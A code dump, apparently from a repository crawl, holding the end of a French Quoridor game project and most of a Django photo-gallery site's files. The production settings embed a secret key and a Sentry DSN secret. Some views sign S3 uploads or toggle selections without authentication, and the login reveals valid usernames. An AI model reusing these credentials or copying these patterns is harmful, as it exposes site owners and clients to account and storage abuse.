#S'assurer que les joueurs ne sont pas enfermés
if nx.has_path(self.graphe, self.joueurs[0]['pos'], 'B1') is False:
self.murs['verticaux'].remove(position)
raise QuoridorError("Le joueur 1 est enfermé! Shame on you.")
elif nx.has_path(self.graphe, self.joueurs[1]['pos'], 'B2') is False:
self.murs['verticaux'].remove(position)
raise QuoridorError("Le joueur 2 est enfermé! Shame on you.")
| {"/vrmtest.py": ["/quoridor.py"], "/quoridorX.py": ["/quoridor.py"]} |
78,169 | samuelgougeon/python_projet2 | refs/heads/master | /main.py | '''Pour exécuter le jeu'''
import argparse
#Fonction du jeu
def analyser_commande():
'''Pour gérer les arguments de la commande dans le terminal'''
parser = argparse.ArgumentParser(description='Jeu Quoridor - phase 3')
parser.add_argument('idul', help='IDUL du joueur')
parser.add_argument('-a', '--automatique', help='Activer le mode automatique.', action='store_true')
parser.add_argument('-x', '--graphique', help='Activer le mode graphique.', action='store_true')
args = parser.parse_args()
return args
analyser_commande()
| {"/vrmtest.py": ["/quoridor.py"], "/quoridorX.py": ["/quoridor.py"]} |
78,170 | samuelgougeon/python_projet2 | refs/heads/master | /quoridorX.py | """Module pour afficher la fenêtre graphique"""
import turtle
import quoridor
class QuoridorX(quoridor.Quoridor):
"""Extension de la classe Quoridor pour créer une fenêtre graphique"""
def afficher(self):
"""Pour créer la fenêtre graphique"""
wn = turtle.Screen()
wn.setup(464, 564)
le = turtle.Turtle()
le.penup()
le.goto(0, 254)
le.write('Légende: bleu={}, rouge={}'.format(self.joueurs[0], self.joueurs[1]),
True, 'center', font=('Cambria', 14))
damier = turtle.Turtle()
damier.shape('square')
damier.shapesize(2)
damier.color('grey')
damier.penup()
damier.speed(0)
ho = turtle.Turtle()
ho.shape('square')
ho.shapesize(0.3, 4.4)
ho.color('black')
ho.penup()
ho.speed(0)
ve = turtle.Turtle()
ve.shape('square')
ve.shapesize(4.4, 0.3)
ve.color('black')
ve.penup()
ve.speed(0)
j1 = turtle.Turtle()
j1.shape('circle')
j1.color('blue')
j1.penup()
j2 = turtle.Turtle()
j2.shape('circle')
j2.color('red')
j2.penup()
for i in self.murs['horizontaux']:
ho.goto(i[0]*48 - 216, i[1]*48 - 264)
ho.stamp()
for i in self.murs['verticaux']:
ve.goto(i[0]*48 - 264, i[1]*48 - 216)
ve.stamp()
for y in range(9):
for x in range(9):
screen_x = -192 + (x*48)
screen_y = 192 - (y*48)
damier.goto(screen_x, screen_y)
damier.stamp()
j1.goto((self.joueurs[0]['pos'][0])*48 - 240, (self.joueurs[0]['pos'][1])*48 - 240)
j2.goto((self.joueurs[1]['pos'][0])*48 - 240, (self.joueurs[1]['pos'][1])*48 - 240)
wn.mainloop()
| {"/vrmtest.py": ["/quoridor.py"], "/quoridorX.py": ["/quoridor.py"]} |
78,174 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/management/commands/process_images.py | from django.core.management.base import BaseCommand, CommandError
from apps.galleries.models import Gallery
from optparse import make_option
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--dimensions',
action='store_true',
dest='dimensions',
default=False,
help='Only update width, height, and is_portrait.'),
make_option('--thumbnails',
action='store_true',
dest='thumbnails',
default=False,
help='Only generate thumbnails.'),
make_option('--s3-object-names',
action='store_true',
dest='s3_object_names',
default=False,
help='Only update s3_object_name (from full_size_url).'),
)
args = '<gallery_id gallery_id ...>'
help = 'Process gallery image meta data and/or thumbnails. If no options are passed, all options are processed.'
def handle(self, *args, **options):
if len(args) == 0:
galleries = Gallery.objects.all()
else:
galleries = []
for gallery_id in args:
try:
galleries.append(Gallery.objects.get(pk=int(gallery_id)))
except Gallery.DoesNotExist:
raise CommandError('Gallery %s does not exist' % gallery_id)
current_gallery = 1
total_galleries = len(galleries)
for gallery in galleries:
self.stdout.write('\n ----------------------------------------')
self.stdout.write(' %s' % (gallery))
self.stdout.write(' Gallery %s of %s' % (current_gallery, total_galleries))
self.stdout.write(' ----------------------------------------')
gallery_images = gallery.galleryimage_set.all()
current_image = 1
total_images = len(gallery_images)
for gallery_image in gallery_images:
self.stdout.write('\n %s' % (gallery_image.name))
self.stdout.write(' Image %s of %s' % (current_image, total_images))
no_options_passed =\
not options['dimensions'] and\
not options['s3_object_names'] and\
not options['thumbnails']
if options['dimensions'] or no_options_passed:
self.stdout.write(' - setting dimensions')
gallery_image.set_dimensions()
if options['s3_object_names'] or no_options_passed:
self.stdout.write(' - setting s3_object_name')
gallery_image.set_s3_object_name()
if options['thumbnails'] or no_options_passed:
self.stdout.write(' - making thumbnails')
gallery_image.generate_thumbnails()
self.stdout.write(' - done!')
current_image += 1
current_gallery += 1
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,175 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/management/commands/freshdb.py | import os
from django.core.management.base import NoArgsCommand
from subprocess import call
class Command(NoArgsCommand):
help = 'Drop the database and create a fresh one'
def handle_noargs(self, **options):
# dropdb
run(
['dropdb', '--if-exists', 'sbp'],
'dropping db'
)
# create the db
run(
['createdb', 'sbp'],
'creating fresh db'
)
# sync db
run(
['python', 'manage.py', 'syncdb', '--migrate', '--noinput'],
'syncing db'
)
# make super user
run(
['python', 'manage.py', 'superuser'],
'making superuser'
)
write('=============================================')
write("\n It's on Donkey Kong!\n")
def run(command, friendly_output):
write('...' + friendly_output)
call(command)
def write(string):
os.sys.stdout.write(string + '\n')
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,176 | levithomason/sparrowbleu | refs/heads/master | /settings/__init__.py | # Choose the right settings, development is excluded from the repo so its only loaded locally
try:
from development import *
except ImportError:
from production import *
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,177 | levithomason/sparrowbleu | refs/heads/master | /fabfile.py | import sys
from fabric.api import local, hide
def test():
local('python manage.py test --attr=!e2e')
def test_e2e():
local('python manage.py test --attr=e2e --nologcapture')
def test_pep8():
local('pep8 . --exclude=venv/,helper_files,migrations')
def push():
local('git push')
def push_heroku():
local('git push heroku master')
def deploy():
print "%" * 80
print " Deploying Sparrow Bleu, me lord!"
print "%" * 80
print ""
with hide('running', 'output', 'stdout'):
_fancy_output("Running python unit tests", test)
_fancy_output("Running python E2E tests", test_e2e)
_fancy_output("Testing PEP8", test_pep8)
# run jasmine tests
_fancy_output("Pushing to GitHub", push)
_fancy_output("Pushing to Heroku", push_heroku)
def _fancy_output(message, func):
sys.stdout.write("%s..." % message)
func()
print "done"
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,178 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/management/commands/superuser.py | from django.core.management.base import NoArgsCommand
from django.db import DEFAULT_DB_ALIAS as database
from django.contrib.auth.models import User
from django.conf import settings
class Command(NoArgsCommand):
help = 'Create superuser from env variables'
def handle_noargs(self, **options):
User.objects.db_manager(database).create_superuser(settings.SUPERUSER_NAME, settings.SUPERUSER_EMAIL,
settings.SUPERUSER_PASSWORD)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,179 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/views.py | from django.shortcuts import redirect
def home(request):
return redirect('/client-access')
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,180 | levithomason/sparrowbleu | refs/heads/master | /apps/user/views.py | from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.models import User
from apps.user.forms import loginForm
def user_login(request):
if request.method == "POST":
form = loginForm(request.POST)
errors = []
if form.is_valid():
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
try:
User.objects.get(username=username)
except User.DoesNotExist:
errors.append('User "%s" does not exist.' % username)
return render(request, 'user_login.html', {'form': form, 'errors': errors})
if user and user is not None and user.is_active:
login(request, user)
return redirect('/galleries/')
else:
errors.append('Wrong password for "%s".' % username)
return render(request, 'user_login.html', {'form': form, 'errors': errors})
return render(request, 'user_login.html', {'form': form})
form = loginForm()
return render(request, 'user_login.html', {'form': form})
def user_logout(request):
logout(request)
return redirect('/')
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,181 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/utils.py | import re
def _human_key(key):
'''
Sorts a list in natural sort fashion
http://stackoverflow.com/questions/5295087/how-to-sort-alphanumeric-list-of-django-model-objects
http://stackoverflow.com/questions/5254021/python-human-sort-of-numbers-with-alpha-numeric-but-in-pyqt-and-a-lt-oper/5254534#5254534
'''
parts = re.split('(\d*\.\d+|\d+)', key)
return tuple((e.swapcase() if i % 2 == 0 else float(e)) for i, e in enumerate(parts))
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,182 | levithomason/sparrowbleu | refs/heads/master | /apps/galleries/urls.py | from django.conf.urls import patterns, url
urlpatterns = patterns('',
# Galleries
url(r'^create-gallery/', 'apps.galleries.views.create_gallery', name='create_gallery'),
url(r'^edit-gallery/(?P<pk>\d+)', 'apps.galleries.views.edit_gallery', name='edit_gallery'),
url(r'^delete-gallery/', 'apps.galleries.views.delete_gallery', name='delete_gallery'),
url(r'^galleries/', 'apps.galleries.views.galleries', name='galleries'),
url(r'^gallery/(?P<version>.*\w)/(?P<passcode>.*\w)', 'apps.galleries.views.gallery_detail', name='gallery_detail'),
url(r'^send-completed-gallery/(?P<pk>\d+)', 'apps.galleries.views.send_completed_gallery', name='send_completed_gallery'),
url(r'^gallery-completed-thanks/', 'apps.galleries.views.gallery_completed_thanks', name='gallery_completed_thanks'),
url(r'^client-access/', 'apps.galleries.views.client_access', name='client_access'),
# Gallery Images
url(r'^create-gallery-image/', 'apps.galleries.views.create_gallery_image', name='create_gallery_image'),
url(r'^s3-sign-upload/', 'apps.galleries.views.s3_sign_upload', name='s3_sign_upload'),
url(r'^toggle-select-gallery-image/', 'apps.galleries.views.toggle_select_gallery_image', name='toggle_select_gallery_image'),
)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,183 | levithomason/sparrowbleu | refs/heads/master | /apps/galleries/models.py | from __future__ import division
import os
import re
import urllib
from django.db.models.signals import post_save, pre_delete
from django.db import models
from PIL import Image
from sorl.thumbnail import get_thumbnail
import tasks
class Gallery(models.Model):
name = models.CharField(max_length=60)
passcode = models.CharField(max_length=60)
number_of_images = models.PositiveIntegerField()
cost_per_extra_image = models.PositiveIntegerField(default=20.00)
def __unicode__(self):
return self.name
@property
def selected_image_count(self):
return self.galleryimage_set.filter(is_selected=True).count()
@property
def total_image_count(self):
return self.galleryimage_set.count()
def get_desktop_url(self):
return "/gallery/%s/%s" % ('d', self.passcode)
def get_mobile_url(self):
return "/gallery/%s/%s" % ('m', self.passcode)
def get_s3_directory_name(self):
return '%s/' % self.pk
class GalleryImage(models.Model):
full_size_url = models.URLField(max_length=200, null=True)
gallery = models.ForeignKey('Gallery')
height = models.PositiveIntegerField(null=True)
is_portrait = models.BooleanField()
is_selected = models.BooleanField(default=False)
name = models.CharField(max_length=100, null=True)
s3_object_name = models.CharField(max_length=200)
width = models.PositiveIntegerField(null=True)
def __unicode__(self):
return self.full_size_url
@property
def _thumbnail_size(self):
"""
The maximum thumbnail dimension. Used for generating thumbnails.
"""
return 720
@property
def _template_thumbnail_size(self):
"""
This is used to calculate the size of the template_thumbnail_<width/height>.
We use _thumbsize_size / 2 so the template renders the images at 2x.
"""
return self._thumbnail_size / 2
@property
def template_thumbnail_width(self):
"""
The width in pixels that the thumbnail should be rendered in the template.
Accounts for portrait/landscape, maintains aspect ratio, and does not exceed _template_thumbnail_size.
"""
max_thumb_width = self.width * (self._template_thumbnail_size / self.height)
if self.is_portrait:
if self.width >= self._template_thumbnail_size:
return self._template_thumbnail_size
else:
return self.width
else:
if self.width < max_thumb_width:
return self.width
else:
return max_thumb_width
@property
def template_thumbnail_height(self):
"""
The height in pixels that the thumbnail should be rendered in the template.
Accounts for portrait/landscape, maintains aspect ratio, and does not exceed _template_thumbnail_size.
"""
max_thumb_height = self.height * (self._template_thumbnail_size / self.width)
if self.is_portrait:
if self.height < max_thumb_height:
return self.height
else:
return max_thumb_height
else:
if self.height >= self._template_thumbnail_size:
return self._template_thumbnail_size
else:
return self.height
def _get_thumbnail(self, width, height):
"""
Wrapper for sorl thumbnail's get_thumbnail. Used for creating various image thumbnails.
Returns a thumbnail url without arguments, such as an S3 Signature.
"""
dimensions = '%sx%s' % (width, height)
thumb = get_thumbnail(self.full_size_url, dimensions, quality=85, crop='noop', upscale=False, padding=True)
url_no_args = re.sub(r'\?.*', '', thumb.url)
return url_no_args
#def fullscreen(self):
#return self._get_thumbnail(1200, 1200)
def generate_thumbnails(self):
"""
Generates image thumbnails
"""
self.thumbnail()
#self.fullscreen()
def process(self):
"""
Sets image dimensions, s3_object_name, and generates thumbnails in one run
"""
self.set_dimensions()
self.set_s3_object_name()
self.generate_thumbnails()
def set_dimensions(self):
"""
Sets image width, height, and is_portrait
"""
urllib.urlretrieve(self.full_size_url, filename=self.name)
image_file = Image.open(self.name)
width = image_file.size[0]
height = image_file.size[1]
is_portrait = image_file.size[0] < image_file.size[1]
os.remove('%s' % self.name)
self.width = width
self.height = height
self.is_portrait = is_portrait
self.save()
def set_s3_object_name(self):
"""
Sets s3_object_name
"""
self.s3_object_name = re.sub(r'http.*com\/', '', '%s' % self.full_size_url)
self.save()
def thumbnail(self):
"""
Returns the thumbnail for the image.
"""
return self._get_thumbnail(self._thumbnail_size, self._thumbnail_size)
def process_gallery_image(sender, **kwargs):
if kwargs['created']:
gallery_image = kwargs['instance']
gallery_image.process()
def delete_gallery_images(sender, **kwargs):
gallery = kwargs['instance']
tasks.delete_gallery_images.delay(gallery.pk)
pre_delete.connect(delete_gallery_images, sender=Gallery)
post_save.connect(process_gallery_image, sender=GalleryImage)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,184 | levithomason/sparrowbleu | refs/heads/master | /apps/galleries/views.py | from __future__ import division
import base64
import hmac
import json
import hashlib
import time
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.core.mail import mail_managers
from django.template.loader import render_to_string
from apps.galleries.models import Gallery, GalleryImage
from apps.galleries.forms import GalleryForm, GalleryImageForm, ClientAccessForm
from apps.sparrow_bleu.utils import _human_key
from django.conf import settings
from sorl.thumbnail import get_thumbnail
from endless_pagination.decorators import page_template
def client_access(request):
if request.method == 'POST':
form = ClientAccessForm(request.POST or None)
if form.is_valid():
passcode = form.cleaned_data['passcode']
is_mobile = form.cleaned_data['is_mobile']
if is_mobile:
version = 'm'
else:
version = 'd'
try:
gallery = Gallery.objects.get(passcode=passcode)
return redirect('/gallery/%s/%s' % (version, passcode))
except Gallery.DoesNotExist:
return render(request, 'client_access.html', {
'gallery_does_not_exist': True,
'passcode': passcode
})
return render(request, 'client_access.html', locals())
def galleries(request):
if not request.user.is_authenticated():
return redirect('/client-access')
galleries = []
for gallery in Gallery.objects.all().order_by('name'):
has_images = GalleryImage.objects.all().filter(gallery=gallery).count() > 0
if has_images:
preview_image = GalleryImage.objects.all().filter(gallery=gallery)[0]
thumb = get_thumbnail(preview_image.full_size_url, '250x250', quality=90, crop='center')
preview_image_url = thumb.url
else:
preview_image_url = None
if gallery.selected_image_count > gallery.number_of_images:
total_cost = (gallery.selected_image_count - gallery.number_of_images) * gallery.cost_per_extra_image
else:
total_cost = 0
galleries.append([gallery, preview_image_url, total_cost])
return render(request, 'galleries.html', {'galleries': galleries})
def create_gallery(request):
if not request.user.is_authenticated():
return redirect('/')
if request.method == 'POST':
form = GalleryForm(request.POST or None)
errors = []
if form.is_valid():
name = form.cleaned_data['name']
passcode = form.cleaned_data['passcode']
number_of_images = form.cleaned_data['number_of_images']
cost_per_extra_image = form.cleaned_data['cost_per_extra_image']
try:
gallery = Gallery.objects.get(passcode=passcode)
errors.append('Gallery "%s" already has passcode "%s".' % (gallery, passcode))
return render(request, 'create_edit_gallery.html', {'form': form, 'errors': errors})
except Gallery.DoesNotExist:
gallery = Gallery(name=name, passcode=passcode, number_of_images=number_of_images, cost_per_extra_image=cost_per_extra_image)
gallery.save()
return redirect('/gallery/%s/%s' % ('d', passcode))
return render(request, 'create_edit_gallery.html', {'form': form, 'errors': errors})
form = GalleryForm()
return render(request, 'create_edit_gallery.html', {'form': form})
def edit_gallery(request, pk):
if not request.user.is_authenticated():
return redirect('/')
if request.method == 'GET':
try:
gallery = Gallery.objects.get(pk=pk)
form = {
'name': {
'value': gallery.name,
},
'passcode': {
'value': gallery.passcode,
},
'number_of_images': {
'value': gallery.number_of_images,
},
'cost_per_extra_image': {
'value': gallery.cost_per_extra_image,
},
}
return render(request, 'create_edit_gallery.html', {'gallery': gallery, 'form': form, 'editing': True})
except Gallery.DoesNotExist:
errors = []
errors.append('Gallery ID %s could not be found' % pk)
return render(request, 'create_edit_gallery.html', {'errors': errors})
if request.method == 'POST':
form = GalleryForm(request.POST or None)
errors = []
try:
gallery = Gallery.objects.get(pk=pk)
if form.is_valid():
name = form.cleaned_data['name']
passcode = form.cleaned_data['passcode']
number_of_images = form.cleaned_data['number_of_images']
cost_per_extra_image = form.cleaned_data['cost_per_extra_image']
# make sure there isn't a different gallery with the edited passcode
try:
duplicate = Gallery.objects.get(passcode=passcode)
if duplicate.pk != gallery.pk:
form = {
'name': {
'value': gallery.name,
},
'passcode': {
'value': duplicate.passcode,
'errors': ['%s\'s passcode is already "%s"' % (duplicate.name, duplicate.passcode)]
},
'number_of_images': {
'value': gallery.number_of_images,
},
'cost_per_extra_image': {
'value': gallery.cost_per_extra_image,
},
}
return render(request, 'create_edit_gallery.html', {'gallery': gallery, 'form': form, 'editing': True})
except Gallery.DoesNotExist:
pass
gallery.name = name
gallery.passcode = passcode
gallery.number_of_images = number_of_images
gallery.cost_per_extra_image = cost_per_extra_image
gallery.save()
return redirect('/galleries/')
return render(request, 'create_edit_gallery.html', {'gallery': gallery, 'form': form, 'editing': True})
except Gallery.DoesNotExist:
errors.append("Sorry, couldn't find a Gallery with id %s." % pk)
return render(request, 'create_edit_gallery.html', {'form': form, 'errors': errors, 'editing': True})
def delete_gallery(request):
if not request.user.is_authenticated():
return redirect('/galleries/')
if request.is_ajax() and request.method == 'POST':
gallery_pk = request.POST.get('gallery_pk')
try:
gallery = Gallery.objects.get(pk=gallery_pk)
gallery.delete()
return HttpResponse(content="Gallery deleted successfully", content_type=None, status=200)
except Gallery.DoesNotExist:
return HttpResponse(content="Sorry, this gallery doesn't exist.", content_type=None, status=400)
else:
return HttpResponse(content="delete_gallery only accepts POST requests. You sent %s." % request.method, content_type=None, status=400)
@page_template('gallery_detail_page.html')
def gallery_detail(request, version, passcode=None, template='gallery_detail.html', extra_context=None):
if version and passcode:
try:
gallery = Gallery.objects.get(passcode=passcode)
gallery_image_qs = GalleryImage.objects.filter(gallery=gallery.pk)
naturally_sorted_qs = sorted(gallery_image_qs, key=lambda img: _human_key(img.name))
gallery_images = []
for image in naturally_sorted_qs:
gallery_images.append({
'pk': image.pk,
'name': image.name,
'width': image.width,
'height': image.height,
'thumbnail': image.thumbnail,
#'fullscreen': image.fullscreen,
'thumb_width': image.template_thumbnail_width,
'thumb_height': image.template_thumbnail_height,
'is_selected': image.is_selected
})
is_mobile = version == 'm'
is_desktop = version == 'd'
context = {
'gallery': gallery,
'gallery_images': gallery_images,
'is_mobile': is_mobile,
'is_desktop': is_desktop
}
if extra_context is not None:
context.update(extra_context)
return render(request, template, context)
except Gallery.DoesNotExist:
return redirect('/galleries/')
else:
return redirect('/galleries/')
def send_completed_gallery(request, pk=None):
if pk:
try:
gallery = Gallery.objects.get(pk=pk)
cost_per_extra_image = gallery.cost_per_extra_image
number_of_images = gallery.number_of_images
images = GalleryImage.objects.all().filter(gallery=gallery, is_selected=True)
sorted_images = sorted(images, key=lambda img: _human_key(img.name))
selected_image_count = images.count()
if selected_image_count > number_of_images:
extra_images = selected_image_count - number_of_images
extra_cost = cost_per_extra_image * (selected_image_count - gallery.number_of_images)
else:
extra_images = 0
extra_cost = 0
context = {
'gallery': gallery,
'images': sorted_images,
'cost_per_extra_image': cost_per_extra_image,
'extra_images': extra_images,
'extra_cost': extra_cost
}
subject = 'Gallery Complete: %s' % gallery.name
html_body = render_to_string('send_completed_gallery_email.html', context)
text_body = render_to_string('send_completed_gallery_email.txt', context)
mail_managers(subject, text_body, html_message=html_body)
return redirect('/gallery-completed-thanks/')
except Gallery.DoesNotExist:
return HttpResponse(content="Gallery with pk '%s' does not exist!" % pk, status=400)
else:
return redirect('/galleries/')
def gallery_completed_thanks(request):
return render(request, 'gallery_completed_thanks.html')
def create_gallery_image(request):
if request.method == "POST":
form = GalleryImageForm(request.POST)
gallery = Gallery.objects.get(pk=request.POST['gallery'])
full_size_url = request.POST['full_size_url']
name = request.POST['name']
s3_object_name = request.POST['s3_object_name']
if form.is_valid():
new_image = GalleryImage.objects.create(full_size_url=full_size_url, gallery=gallery, name=name,
s3_object_name=s3_object_name)
new_image.save()
return HttpResponse(content=new_image.pk, content_type=None, status=200)
else:
return HttpResponse(content="The request form is invalid:\n\n" + str(form.errors), content_type=None, status=400)
def s3_sign_upload(request):
object_name = request.GET.get('s3_object_name')
mime_type = request.GET.get('s3_object_type')
expires = int(time.time() + 3600)
amz_headers = "x-amz-acl:public-read"
put_request = "PUT\n\n%s\n%d\n%s\n/%s/%s" % (mime_type, expires, amz_headers, settings.AWS_STORAGE_BUCKET_NAME, object_name)
signature = base64.encodestring(hmac.new(settings.AWS_SECRET_ACCESS_KEY, put_request, hashlib.sha1).digest())
signature = signature.replace(' ', '%20').replace('+', '%2B')
url = 'https://%s.s3.amazonaws.com/%s' % (settings.AWS_STORAGE_BUCKET_NAME, object_name)
data = json.dumps({
'signed_request': '%s?AWSAccessKeyId=%s&Expires=%d&Signature=%s' % (
url, settings.AWS_ACCESS_KEY_ID, expires, signature),
'url': url
})
return HttpResponse(data, mimetype='application/json')
def toggle_select_gallery_image(request):
if request.is_ajax() and request.method == 'POST':
try:
image_pk = request.POST.get('image_pk')
image = GalleryImage.objects.get(pk=image_pk)
image.is_selected = not image.is_selected
image.save()
return HttpResponse(content=image.is_selected, content_type=None, status=200)
except GalleryImage.DoesNotExist:
return HttpResponse(content="Could find image.", content_type=None, status=400)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,185 | levithomason/sparrowbleu | refs/heads/master | /settings/production.py | # grab default settings, then override as necessary for production
from default import *
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
DEBUG = False
TEMPLATE_DEBUG = False
# Parse database configuration from $DATABASE_URL
import dj_database_url
DATABASES['default'] = dj_database_url.config()
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'dyelf3m-y9*&0@4the0b@70qy93dy$k#n#-2&or5d(l1a0&6bl'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'apps.sparrow_bleu.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = os.path.join(PROJECT_PATH, 'wsgi.application')
INSTALLED_APPS += (
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
# Set your DSN value
RAVEN_CONFIG = {
'dsn': 'https://c4bf3fe7a4e64448a062c04a603e7450:de418b2411944472a3c6695270622d41@app.getsentry.com/13905',
}
INTERNAL_IPS = ('',)
# Email
EMAIL_BACKEND = 'postmark.django_backend.EmailBackend'
# Celery
BROKER_URL = os.environ['RABBITMQ_BIGWIG_RX_URL']
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,186 | levithomason/sparrowbleu | refs/heads/master | /apps/user/forms.py | from django import forms
from apps.galleries.models import Gallery
class loginForm(forms.Form):
